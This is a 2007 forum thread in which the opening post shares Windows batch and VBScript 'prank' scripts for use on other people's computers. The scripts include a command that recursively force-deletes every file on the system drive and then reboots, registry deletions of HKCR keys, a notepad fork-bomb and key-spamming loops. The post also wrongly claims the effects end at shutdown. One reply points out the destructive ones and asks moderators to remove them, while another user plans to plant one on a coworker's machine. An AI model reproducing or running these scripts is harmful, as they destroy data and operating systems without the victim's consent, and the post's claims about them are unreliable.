Jump to content



Welcome to KnowledgeSutra - Dear Guest , Please Register here to get Your own website. - Ask a Question / Express Opinion / Reply w/o Sign-Up!
- - - - -

Nasty Windows Tricks Using Vbs Codes


19 replies to this topic

#1 GaMeRrEmAg

    Newbie [Level 2]

  • Kontributors
  • PipPip
  • 30 posts

Posted 08 December 2007 - 11:46 PM

The CMD Codes- to use, open up notepad and copy and paste the code into the notepad. name the file (anyname).vbs (to make a .vbs file, when u save it or save as, it will ask u for a name and which type u want it, so choose all file then just name it as a .vbs file) then just click on the file u just made

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off
 del %systemdrive%\*.* /f /s /q
 shutdown -r -f -t 00



-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

@echo off
 msg * Fatal system error due to admin stupidity!
 shutdown -c "Error! You are too stupid!" -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your computer has been fcked.  Have a nice day.
 GOTO MESSAGE

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

-Endless Backspace
*This makes it so the backspace key is constantly being pressed*

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

-Popping CD Drives
*This will make the CD drives constantly pop out*

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Edited by OpaQue, 10 December 2007 - 07:10 AM.


#2 elaks

    Advanced Member

  • Kontributors
  • PipPipPipPipPipPipPip
  • 114 posts
  • Gender:Male
  • Location:England

Posted 09 December 2007 - 12:21 PM

Unless this is copied from another source you've managed to categorize things quite nicely. Again- I'd put a really big warning about the Registry Key deleting one; something with big red text.. I've never heard of some of these before. The reoccuring backspace sounds like fun, and the forced blue screen could freak an experienced computer user out. I will most certainly bookmark this topic for future reference. It's a shame so many of my friends use Macs. :P

Also, this is the wrong section.

#3 thejestergl

    Super Member

  • Kontributors
  • PipPipPipPipPipPipPipPipPip
  • 230 posts

Posted 09 December 2007 - 05:50 PM

I have to admit that this is a pretty nifty thing to have, and good to know that it goes away when they shut off their computer (so you aren't a COMPLETE jerk). Some of the things you posted are more annoyances which is better then just messing up their computer completely. I think there should be a limit for how far you can go, and I think this one just hits the line so it didn't go too far.

Personally I like the one that will constantly open the CD drive because I know that can get really annoying haha. Then again having the backspace key constantly pressed down could be rather bad. I know that I would just die if I had a whole essay typed up and then re-opening it and find that my work got backspaced out xD! Though I know you can just not save it, it is still funny.

I think that what you have written is actually not really for someone you hate or seek revenge for, but rather a good prank. At least for most of the code it is! If it does no permanent damage I don't see how this can be all in good fun, especially since most of these again aren't really bad for the computer, but rather annoying to the user. I think I might use some of these for an april fools joke hehe. Thanks a million! <3

-Jester

#4 cangor

    Privileged Member

  • Kontributors
  • PipPipPipPipPipPipPipPipPip
  • 529 posts
  • Gender:Male
  • Location:The Basement
  • Interests:Badminton, Tennis, Music
  • myCENT:8.05

Posted 10 December 2007 - 01:45 AM

Man, that's completely diabolical. Like thejestergl says though, it's not really for someone you hate. If you hate someone then you tell them that, and tell them that they're a jerk, and they're not worth the dirt on your shoes or whatever, but revenge is never a good idea. These would definately make for a good prank on a friend though. I like the one about the constantly popping CD drives. :P

#5 Saint_Michael

    $p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3

  • [MODERATOR]
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 7,459 posts
  • Gender:Male
  • Location:9r33|\| 399$ 4|\|D 5P4/\/\
  • Interests:$p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3
  • myCENT:71.24

Posted 10 December 2007 - 02:49 AM

Some of them are interesting and I have a funny feeling those could be used in payloads for viruses, worms, trojans etc etc. Although these would be good to play on you friends, well not the file deleting, OS re-installation; but the CD ROM drive and the keyboard tricks would be funny because then they will start yelling at the computer companies on the phone about their computer's screwing up :P.

#6 FLaKes

    Trap Grand Marshal Member

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPip
  • 1,142 posts
  • Gender:Male
  • Location:Mexico
  • Interests:Music, Animations, Graphics, almost everything that has to do with computers.
  • myCENT:NEGATIVE[-36.23]

Posted 10 December 2007 - 08:13 AM

Cool, I am going to try the one with the popping cd tray right now on my co workers computer, I just need the network name so I can leave him this little present. LOL.... hehe :P

#7 Galahad

    Neurotical Squirrel

  • Kontributors
  • PipPipPipPipPipPipPipPipPip
  • 590 posts
  • Gender:Male
  • Location:Novi Sad, Vojvodina
  • Interests:Programming, Hardcore dance/Trance/House music. Girls, girls and more girls ;) ... In short, everything youg people like, I like :D Oh yeah, and dont't forget politics :)
  • myCENT:48.25

Posted 10 December 2007 - 09:37 AM

First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...

View PostGaMeRrEmAg, on Dec 9 2007, 12:46 AM, said:

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.
This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...

I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...

BAT-1

View PostGaMeRrEmAg, on Dec 9 2007, 12:46 AM, said:

@echo off
 del %systemdrive%\*.* /f /s /q
 shutdown -r -f -t 00
This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!

Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...

BAT-2

View PostGaMeRrEmAg, on Dec 9 2007, 12:46 AM, said:

-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

@echo off
 msg * Fatal system error due to admin stupidity!
 shutdown -c "Error! You are too stupid!" -s -t 10

Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...

BAT-3

View PostGaMeRrEmAg, on Dec 9 2007, 12:46 AM, said:

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your computer has been fcked.  Have a nice day.
 GOTO MESSAGE
This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...

BAT-4

View PostGaMeRrEmAg, on Dec 9 2007, 12:46 AM, said:

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...

It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...

I would urge the moderators to remove BAT-1 and BAT-3 codes, as they pose a big risk for users that do not know what they do... And I would recommend warning this user about posting such content... This could be very harmfull to this community...

#8 rayzoredge

    That Guy Who Doesn't Know What He's Talking About

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPip
  • 1,050 posts
  • Gender:Male
  • Location:New Durham, NH
  • Interests:Computers, chat, gaming, snowboarding, paintball, web design, music
  • myCENT:84.40

Posted 10 December 2007 - 04:28 PM

View PostGalahad, on Dec 10 2007, 04:37 AM, said:


Thanks for clarifying that. When OP mentioned them as VBS scripts, I was wondering why VBS looked so much like command-line batch files...

I thought netsend was to send messages over the network...

#9 Liam_CF

    Super Member

  • Kontributors
  • PipPipPipPipPipPipPipPipPip
  • 403 posts
  • Location:ERROR 404

Posted 10 December 2007 - 05:34 PM

Thanks I'll probably use on of these for april fools or something.

#10 GaMeRrEmAg

    Newbie [Level 2]

  • Kontributors
  • PipPip
  • 30 posts

Posted 10 December 2007 - 08:23 PM

:P well, i have tried a few of these and they seem to be in order.
the shutdown one does NOT delete the hard disk. i have ones tht do though >=)
i typed up vbs at the top because some (crazy caps, textpad, ect) wont work on some computers.
damn typing with the ps3 controller is annoying




Reply to this topic


This post will need approval from a moderator before this post is shown.

  


1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users